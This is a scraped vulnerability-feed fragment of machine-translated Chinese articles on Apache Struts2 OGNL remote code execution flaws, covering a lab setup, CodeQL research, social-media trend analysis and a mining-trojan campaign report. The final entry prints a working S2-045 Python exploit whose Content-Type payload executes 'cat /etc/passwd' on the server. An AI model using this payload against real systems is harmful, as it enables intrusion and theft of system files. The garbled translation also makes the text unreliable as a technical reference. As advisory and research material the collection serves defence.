location of your choice we use/var/tomcat, and continues: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *. sh # set the script to executable file \n./ startup.sh # run the startup script \nOur visit to http://localhost:8080/, and check whether the site running. \nAfter the confirmation, we are ready to download the old version of the Apache Struts framework, which is vulnerable to our upcoming demo of the vulnerability attack. This page provides to meet our needs 2. 3. 30 version The Struts in. \nIn the extract compressed content, we should be in the/apps position seen under struts2-showcase. war file. This is one use of the Struts compiled and ready to deploy demo application. Just need the WAR file is copied to/var/tomcat/webapps, and access http://localhost:8080/struts2-showcase/showcase. action confirm whether it is valid. \n[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)the basics \nIf you have a good grasp of the Java Web applications related to simple concepts such as Servlets, then you would have been leading. If you are new to the Java Servlet knows nothing about, it can be understood simply as a component, its purpose is to create for in the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)hosted on Web applications the Web container, in addition, it is also responsible for the processing of the/struts2-showcase and other Java applications request. \nTo the processing Servlet, the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), for example Apache Tomcat requires some Assembly: \n1\\. Apache Coyote is to support the HTTP/1.1 Protocol connector. It allows the Servlet container components of Apache Catalina to communicate. \n2\\. Apache Catalina container when determined in the Tomcat receives an HTTP request, you need to call which the Servlet container. It will also HTTP request and response from the text is converted to a Servlet using a Java object. \n! [](/Article/UploadPic/2019-3/201933032655612. png) \nHere you can find information about the Java Servlet specification for all the details of the latest version 4. 0 in. \nApache Struts basics \nWith Java Web applications using the Apache Struts Framework application can have multiple Servlet. This article's main purpose is not to let everyone understand this to build the Web application framework, but on the surface the hang of the basic concepts. We can step-by-step tutorial on the subject. \nThe Apache Struts framework relies on MVC model-View-Controller architecture pattern. IT application very helpful, because you can separate the main application components: \n1\\. Model: represents the application data, for example, using\u201corders\u201dand other data of the class. \n2\\. View: is the output of the application, the visual part. \n3\\. The controller: receiving a user input, using the model to generate the view. \n4\\. Action Actions: the Apache Struts in the model. \n5\\. Intercept the Interceptors: the part of the controller, they can be in processing the request before or after the invocation of the hook. \n6\\. Value stack/OGNL: a set of objects, for example, model or action object. \n7\\. Result/result type: used to select business logic view. \n8\\. View of technology: the processing of data display. \nYou can see below the Apache Struts Web application General architecture: \n! [](/Article/UploadPic/2019-3/201933032655347.jpg) \nController receives the HTTP request, the FilterDispatcher is responsible for according to the request to invoke the right Operation. And then perform the operation, the view component is ready for a result and sends it to the HTTP response in the user. \nStruts application example \nYou want to start from scratch to write a Struts application takes some time, so we will use an already available rest-showcase demo application, which is a basic front-end a simple REST API. To compile the application, we only need to go into its directory and use Maven to compile: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nIn the target directory, we can find the following files: struts2-rest-showcase. war. You can copy it to the Tomcat server's webapps directory, for example:/var/tomcat/webapps to install it. \nThe following is the application source code: \n! [](/Article/UploadPic/2019-3/201933032655780. png) \nThe following are the available file description: \n1\\. Order. java is model, which is a storing order information of a Java class. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService. java is a Helper class, which will be the Orders stored in the HashMap of the total, and its management. \npublic class OrdersService { \n\n\n**[1] [[2]](<93410_2.htm>) [[3]](<93410_3.htm>) [[4]](<93410_4.htm>) [[5]](<93410_5.htm>) [[6]](<93410_6.htm>) [next](<93410_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T14:31:18", "description": "It is possible to perform a RCE attack when the namespace value isn't set for a result defined in underlying xml configurations and in the same time, its upper action(s) configurations have no or wildcard namespace. The Same possibility when using the url tag which doesn't have value and action set and in the same time, its upper action(s) configurations have no or wildcard namespace. -- Apache Struts2 Team \n2018 8 May 23, Apache Strust2 released the latest security Bulletin, the Apache Struts2 there is a remote code execution of high-risk vulnerability by Semmle Security Research team of security researchers reporting vulnerabilities number of CVE-2018-11776\uff08S2-057 in. Struts2 in XML configuration, if the namespace value is not set and the Action Configuration is not set or wildcard namespace may lead to remote code execution. \n\n0x01 vulnerability affect \nAffect \nDetermining CVE-2018-11776 as a high-risk vulnerability. \nThe actual scene there are some limitations that need to meet certain conditions. \nImpact version \nStruts 2.3 to 2.3.34 \nThe Struts 2.5 to 2.5.16 \nFix version \nThe Struts 2.3.35 \nThe Struts 2.5.17 \n\n0x02 vulnerability verification \n! [](/Article/UploadPic/2018-8/2018823153240150. png) \nIncoming OGNL expression${2333+2333} \n! [](/Article/UploadPic/2018-8/2018823153240244. png) \nSuccess with the execution of the function, and perform \n! [](/Article/UploadPic/2018-8/2018823153240318. png) \nReturns the result to the URL \n\n0x03 repair recommendations \nThe official recommended to upgrade the Struts to 2. 3. 35 version or 2. 5. 17 version \nThe updated version there are no compatibility issues \n\n0x04 timeline \n2018-08-22 vulnerability disclosure \n2018-08-22 360CERT publish early warning analysis advertisement \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "Apache Struts2 S2-057 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891267", "href": "http://www.myhack58.com/Article/html/3/62/2018/91267.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-23T14:31:31", "description": "! [](/Article/UploadPic/2018-8/2018823153022212.jpg) \n2018 4 months, I to Apache Struts and the Struts security team reported a new remote code execution vulnerability--CVE-2018-11776\uff08S2-057 in to do some configuration on a server running Struts, and can be accessed via the carefully constructed URL to trigger the vulnerability. This discovery is I the Apache Struts ongoing Safety study of part. In this article, I will describe my discovery of a vulnerability and how to exploit the previous vulnerability information to get the Struts internal working of the principle, create a package Struts-specific concept of the QL query. Run these queries will highlight the problematic code results. These works are hosted on GitHub, later we will also to this repository add more query statement and database to help the Struts and other projects of the security research. \n\nMapping the attack surface \nMany security vulnerabilities are addressed from untrusted sources such as user input stream to a particular location of the sink of the data, and the data using an unsafe way-for example, the SQL query, deserialize, and some other interpreted languages, etc., QL can easily search for such vulnerabilities. You just need to describe the various source and sink, and then let the DataFlow library to accomplish these things. For a particular project, began to investigate such issues, a good method is to view the older version of the software known vulnerabilities. This can be in-depth understanding you want to find the source and sink points. \nThis vulnerability discovery process, I first see a RCE vulnerability S2-032\uff08CVE-2016-3081\uff09, S2-033\uff08CVE-2016-3687 and S2-037\uff08CVE-2016-4438-in. With Struts in many other RCE as RCE relates to the untrusted input is converted to OGNL expressions, allowing an attacker on the server to run arbitrary code. These three vulnerabilities are particularly interesting, not only do they let us on the Struts of the internal working mechanism have some understanding, and these three vulnerabilities actually is the same, also repair three back! \nThese three issues are the remote input through the variable methodName as a method of parameter passing caused OgnlUtil::getValue(). \n! [](/Article/UploadPic/2018-8/2018823153022696. png) \nHere the proxy has ActionProxy type, it is an interface. Note that the definition of it, in addition to the method getMethod\uff08\uff09\uff08in the above code is used to assign a value to the variable methodName addition, there are a variety of methods, such as getActionName\uff08\uff09and getNamespace\uff08\uff09\u3002 These methods look like from the URL to return information, so I'll just assume that all of these methods may return untrusted input. The rear of the article I will in depth research I for these the input from where the investigation.\uff09 \nNow use QL to start on these untrusted source modeling: \n! [](/Article/UploadPic/2018-8/2018823153023567. png) \n\nIdentify the OGNL sink point \nNow that we have identified and described some of the non-trusted source, the next step is to sink the point of doing the same thing. As previously mentioned, many of Struts RCE relates to the remote input parsed for OGNL expressions. Struts has many function will eventually be their arguments as OGNL expressions; for we in this article the start of the three vulnerabilities, the use of a OgnlUtil :: getValue \uff08\uff09, but in the vulnerability S2-045\uff08CVE-2017-5638, using TextParseUtil :: translateVariables\uff08\uff09\u3002 We may be looking for execution of OGNL expressions commonly used function, I feel OgnlUtil :: compileAndExecute\uff09and OgnlUtl :: compileAndExecuteMethod\uff08\uff09looks more games. \nMy description: \n! [](/Article/UploadPic/2018-8/2018823153023415. png) \n\nThe first attempt \nNow we have in QL are defined in the source and sink, we can stain the tracking query using these definitions. By defining DataFlow configured to use the DataFlow library: \n! [](/Article/UploadPic/2018-8/2018823153023702. png) \nHere is what I used before defined isActionProxySource and isOgnlSink it. \nNote that I'm here to reload the isAdditionalFlowStep, so that it can allow me to contain the pollution data is propagated to the additional step. Such as allow me to the project-specific information into the flow configuration. For example, if I have by a network of communicating components, I may be in QL as described in those various network-side code is what allows the DataFlow library to track tainted data. \nFor this particular query, I added two additional process steps for the DataFlow library. First: \n! [](/Article/UploadPic/2018-8/2018823153026173. png) \nIt includes tracking the standard Java library calls, string manipulation, etc. of the standard QL TaintTracking library steps. The second Add is an approximate value, allow me to by a field access track tainted data: \n! [](/Article/UploadPic/2018-8/2018823153026186. png) \nThat is if the field is assigned a tainted value, then as long as the two expressions are the same type of method call, the field visit will also be regarded as pollution. See the following example: \n! [](/Article/UploadPic/2018-8/2018823153026144. png) \nSeen from above, the bar in this. field access may not always be contaminated. For example, if in the bar before not to call foo\uff08\uff09\u3002 Therefore, we are not in the default DataFlow :: Configuration contained in this step, because you cannot guarantee that the data always in this manner the flow, however, for digging vulnerabilities, I think adding this very useful. In later posts I will share some of the similar to the other process steps, these steps for find the bug helpful, but for similar reasons, the default case is not included these steps. \n\nThe initial results and Refine the query \nI'm on the latest version of the source code on the run a bit with QL, found that due to the S2-032, S2-033 S2-037 is still marked. These vulnerabilities obviously already been fixed, why still will be reported problem? \n\n\n**[1] [[2]](<91264_2.htm>) [[3]](<91264_3.htm>) [next](<91264_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "S2-057 vulnerability in the original author's README: how to use automated tools find 5 RCE-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4438", "CVE-2017-5638", "CVE-2018-11776", "CVE-2016-3687", "CVE-2016-3081"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891264", "href": "http://www.myhack58.com/Article/html/3/62/2018/91264.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-16T03:17:43", "description": "Author: janes(know Chong Yu 404 laboratory)\n\nDate: 2017-03-15\n\n## Background description\n\nStruts2 official to GMT 2017 3 December 6, 10pm published Struts2 there is a remote code execution vulnerability vulnerability number S2-045, CVE number: CVE-2017-5638, and rated as high-risk vulnerabilities. Because the vulnerability affects a wide range of\uff08Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10, the vulnerability degree of harm is severe, you can directly access the application system of the server where the control limit, and 3 on 7 May in the morning on the Internet on the outflow of the vulnerability of the PoC and Exp,so, S2-045 vulnerability in the Internet on the impact of rapid expansion, by the Internet companies and the government attach great importance. From vulnerability announcement to now(3.6-3.15)has been more than a week, so take this opportunity to analyze S2-045 in the social media Twitter and on Sina Weibo heat distribution.\n\n## Data acquisition\n\nIf you want to analyze Twitter and on Sina Weibo, S2-045 vulnerability of the heat distribution, then you need to get Twiiter and Facebook on the data, with the data speak. So they use\u201cselenium+phantomjs\u201dgo crawling the data via Twitter and Sina Weibo web page to the search interface, respectively, search for the keyword\u201cs2-045\u201dand\u201cCVE-2017-5638\u201d, then the search results go to the weight and finishing, taking to Twitter and Facebook, the time display of the time zone inconsistencies, using the same crawl page timestamp and then converted to the local time of the way of a unified time zone issues, the crawling data in the time to 2017 year 3 month 14 days afternoon 18 when, the results as shown below.\n\n* Twitter! [](/Article/UploadPic/2017-3/2017316104811455. png)\n\n* Sina Weibo! [](/Article/UploadPic/2017-3/2017316104812512. png)\n\n## Heat analysis\n\nStatistics daily S2-045 vulnerability in the Twitter and on Sina Weibo, the number of occurrences, to obtain the following table, Twitter, the CCP appears 73 times, Sina Weibo, the CCP appears 45 times. On the dissemination of the amount of data, S2-045 vulnerability of the data amount is not large, this reflected from the side of the security vulnerabilities of the information and not by the majority of the people of concern, mainly in the security circle propagation.\n\n| Social media | 3 December 7 | 3 8 March | 3 April 9 | 3 October 10 | 3 11 March | 3 November 12 | 3 13 February | 3 March 14 \n---|---|---|---|---|---|---|---|--- \nTwitter| 16 | 3 | 7 | 15 | 6 | 11 | 15 | 0 \nSina Weibo| 23 | 8 | 7 | 3 | 0 | 0 | 1 | 3 \n\n! [](/Article/UploadPic/2017-3/2017316104812815. png)\n\nUsing the above table of data, production of graphics, get as on the heat distribution from the figure it can be seen:\n\n* 3 month 6 day before the announcement of the S2-045 vulnerability, 3 on 7, on Twitter and on Sina Weibo, the occurrence of the outbreak spread, which is likely to and vulnerabilities of the PoC and Exp in 3 month 7 days you on the Internet widely spread about;\n* Sina Weibo, S2-045 vulnerability to the heat distribution of the overall downward state, in the peak in 3 month 7 days, while Twitter as a whole was undulating trend, 3 on 7th, 3 on 10th and 3 on 13 September are peak;\n* Sina Weibo and Twitter for both the overall potential is not the same, and in 3 on the 7th, Sina Weibo and Twitter are data of the highest peak, but Sina Weibo, the amount of data than Twitter.\n\nThere may be several reasons could explain this phenomenon:\n\n* S2-045 vulnerability is the Chinese found that, 3 on 6 September evening, the official publication of the vulnerability, 3 on 7 on the morning of the vulnerabilities of the PoC and Exp in domestic Internet flow out, by domestic security company-wide attention, this also would explain the 3 on 7 The New Wave of microblogging amount of data over the Twitter phenomenon;\n* Due to the S2-045 vulnerability to serious harm, and quickly spread out of PoC and Exp, and therefore, 3 on 7 August, the domestic security companies will quickly start the emergency response, other Internet companies also in self-examination and patch S2-045 vulnerability, with the vulnerability of repair, on Sina Weibo, the attention naturally reduces, the overall will show a downward trend;\n* Twitter user distribution of a wide range of countries or regions affected by the S2-045 the influence is different, therefore trends appear UPS and downs.\n\n3 December 7, Sina Weibo and Twitter are data peak, then the 3 on 7, data, time period distribution mapping as follows, As can be seen, the morning 8 When before, Sina Weibo and Twitter, the amount of data is 0, 8 to 10 period rooms began to appear, it seems, and working hours more in line with the, The and the data the peak occurred mainly in the afternoon 14 to 18 between, perhaps this is because PoC and Exp on the Internet widely spread, caused the Internet began to be mass attack(reference [HackerNews Struts2 vulnerability disclosure 24 hour](<http://hackernews.cc/archives/7371>)) to.\n\n! [](/Article/UploadPic/2017-3/2017316104812327. png)\n\nFinally, look at Twitter and Sina Weibo on on S2-045 vulnerability in the first message what time and by whom issued, and the results are shown in the following table. Twitter and Sina microblogging issued the first message is not the same person, but the transmission time difference is not much, visible at home and abroad to exploit the perceptual capacity is relatively quite.\n\nIbid., the times are Beijing time, according to the unix time stamp conversion.\n\nSocial media | time | nickname | real identity\n---|---|---|--- \nTwitter | 2017-03-07 09:29:00 | @amannk | \nSina Weibo | 2017-03-07 09:44:29 | gnaw0725 | nsfocus Brand Manager Wang Yang\n\n**[1] [[2]](<84379_2.htm>) [next](<84379_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "myhack58", "title": "The Struts S2-045 vulnerability heat analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "MYHACK58:62201784379", "href": "http://www.myhack58.com/Article/html/3/62/2017/84379.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-10T13:31:12", "description": "0\u00d71 Overview \nMany business websites use the Apache open source project to build a http server, which is most of the use of the Apache sub-project of Struts in. But since the Apache Struts2 Product code there are more risks, beginning in 2007, Struts2 will frequently broke multiple high-risk vulnerabilities. \nFrom the Apache official data, from 2007 to 2018 total published number S2-001 to S2-056 total of 56 vulnerabilities, of which only a remote code execution vulnerability Remote Code Execution on a 9. \n! [](/Article/UploadPic/2018-7/2018710164555841. png? www. myhack58. com) \n2017 3 months was reported out of the S2-045\uff08CVE-2017-5638 high-risk vulnerabilities, based on Jakarta Multipart parser implementation file upload may lead to an RCE, the impact of the range of the Struts 2.3.5 \u2013 Struts 2.3.31, as well as the Struts 2.5 \u2013 Struts 2.5.10 version, persists to be utilized for an attack. \n2018 year 4 months Tencent Yu see Threat Intelligence Center had been monitoring the hacker group exploit this vulnerability bulk of the invasion[the web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)implantation mining Trojan\uff08for more details, see the enterprise not fix Apache Struts 2 vulnerability-induced[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)is the bulk of the invasion article, the recent Royal to see the Threat Intelligence Center is again monitored a similar attack. \nThis attack, hackers use attack tools WinStr045 detecting the presence on the network vulnerability[web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), found that the presence of vulnerability of the machine through a remote execution of various types of instruction provide the right to, create, account, system information gathering, and then will be used to download the Trojan mas. exe the implant, then the use of mas. exe this Trojan Downloader from the plurality of C&C;address to download more Trojans: the \u5229\u7528\u63d0\u6743\u6728\u9a6co3/o6.exe and \u6316\u77ff\u6728\u9a6cnetxmr4.0.exe the. \nSince the bitcoin mining Trojan netxmr the decryption code after the module name\u201ckoi\u201dis loaded, therefore, Tencent Yu see Threat Intelligence Center will be named for KoiMiner it. Interestingly, intruders to ensure your mining success, it will check the system processes, CPU resource consumption, and if CPU usage exceeds 40%, it will be the end of the Run, will save the system resources for the mining of. \nAccording to the code traceability analysis, Tencent Yu see Threat Intelligence Center researchers believe that this KoiMiner series mining Trojan is probably some hacker forums, underground mining organizations to share in the community more people cooperation of the\u201cpractice\u201dworks. \n! [](/Article/UploadPic/2018-7/2018710164555994. png? www. myhack58. com) \nAttack process \nNote: Struts is based on MVC design pattern Web application framework, the user use of the framework can be business logic code from the presentation layer clearly separated, so as to focus on the business logic and the mapping relationship between the configuration file. Struts2 is Struts and WebWork combination, a combination of Struts and WebWork advantages, the use of interceptor mechanisms to process the user's request, so that business logic can with ServletAPI completely out of the opening. \n0\u00d72 a detailed analysis of the \n0 x 2.1 intrusion \nThe detection of the target system whether the presence of S2-045 vulnerability \n! [](/Article/UploadPic/2018-7/2018710164555176. png? www. myhack58. com) \nThe presence of the vulnerability of the system to attack \n! [](/Article/UploadPic/2018-7/2018710164555748. png? www. myhack58. com) \nInvasion tool for the selection of osmotic command \n! [](/Article/UploadPic/2018-7/2018710164555749. png? www. myhack58. com) \nThe invasion can be selected when execution of the command can also be self-defined,choose the command Windows, linux, penetration of commonly used commands, including viewing system version information, network connection status, port open status and add to the system with administrator privileges to the new user, open the remote connection service and other operations. \n! [](/Article/UploadPic/2018-7/2018710164555928. png? www. myhack58. com) \nThrough the directory view command to confirm C:\\Windows\\Help directory and C:\\ProgramData whether the directory has been implanted Trojan, if not then the mas. exe Trojan infection. The time of implantation to first create the C#code to text mas. cs, \u7136\u540e\u4f7f\u7528.NET\u7a0b\u5e8f\u5c06\u5176\u7f16\u8bd1\u4e3a\u53ef\u6267\u884c\u6587\u4ef6mas.exe the. \nFirst execute the command to create a mas. cs and write The for download code. \n! [](/Article/UploadPic/2018-7/2018710164555437. png? www. myhack58. com) \n\u7136\u540e\u6267\u884c\u547d\u4ee4\u5c06mas.cs\u901a\u8fc7.NET\u7a0b\u5e8f\u7f16\u8bd1\u4e3amas.exe the. \n! [](/Article/UploadPic/2018-7/2018710164555672. png? www. myhack58. com) \nCommand in the use of mas. exe download mining Trojan netxmr4. To 0. \n! [](/Article/UploadPic/2018-7/2018710164555433. png? www. myhack58. com) \nPart of the attack objectives are as follows: \n! [](/Article/UploadPic/2018-7/2018710164555651. jpg? www. myhack58. com) \nImplantation of mas. the exe size is only 4k,is stored in the directory ProgramData. From Yu see Threat Intelligence Center monitoring and recording can be seen, mas.exe\u4ece\u591a\u4e2aC2\u5730\u5740\u4e0b\u8f7d\u4e86netxmr4.exe(mining Trojan), the o3.exe/o6.exe(providing the right to Trojans)and other Trojans. \n! [](/Article/UploadPic/2018-7/2018710164555713. png? www. myhack58. com)\n\n**[1] [[2]](<90758_2.htm>) [[3]](<90758_3.htm>) [[4]](<90758_4.htm>) [next](<90758_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-07-10T00:00:00", "type": "myhack58", "title": "Apache Struts2 high-risk vulnerabilities cause the Enterprise Server is the invasion mounted KoiMiner mining Trojan-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-07-10T00:00:00", "id": "MYHACK58:62201890758", "href": "http://www.myhack58.com/Article/html/3/62/2018/90758.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:04", "description": "! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com) \nFreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported. \nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. \nVulnerability number\nCVE-2017-5638 \nVulnerability description\nThe Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution. \nIn fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it. \nThe scope of the impact\nThe Struts 2.3.5 \u2013 Struts 2.3.31 \nThe Struts 2.5 \u2013 Struts 2.5.10 \nSolution\nIf you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver. \nVulnerability PoC \n#! /usr/bin/env python \n# encoding:utf-8 \nimport urllib2 \nimport sys \nfrom poster. encode import multipart_encode \nfrom poster. streaminghttp import register_openers \nheader1 ={ \n\"Host\":\"alumnus. shu. edu. cn\", \n\"Connection\":\"keep-alive\", \n\"Refer\":\"alumnus. shu. edu. cn\", \n\"Accept\":\"*/*\", \n\"X-Requested-With\":\"XMLHttpRequest\", \n\"Accept-Encoding\":\"deflate\", \n\"Accept-Language\":\"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4\", \n} \ndef poc(): \nregister_openers() \ndatagen, headers = multipart_encode({\"image1\": open(\"tmp.txt\", \"rb\")}) \nheader[\"User-Agent\"]=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\" \nheader[\"Content-Type\"]=\"'%{(#nike,='multipart/form-data'). \n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). \n(#_memberAccess? (#_memberAccess=#dm): \n((#container=#context['com. opensymphony. xwork2. ActionContext. container']). \n(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). \n(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). \n(#context. setMemberAccess(#dm)))). (#cmd='cat /etc/passwd'). \n(#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). \n(#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). \n(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). \n(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). \ngetOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). \n(#ros. flush())}\"' \nrequest = urllib2. Request(str(sys. argv[1]),datagen,headers=header) \nresponse = urllib2. urlopen(request) \nprint the response. read() \n\npoc() \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "Apache Struts2 exposure arbitrary code execution vulnerability 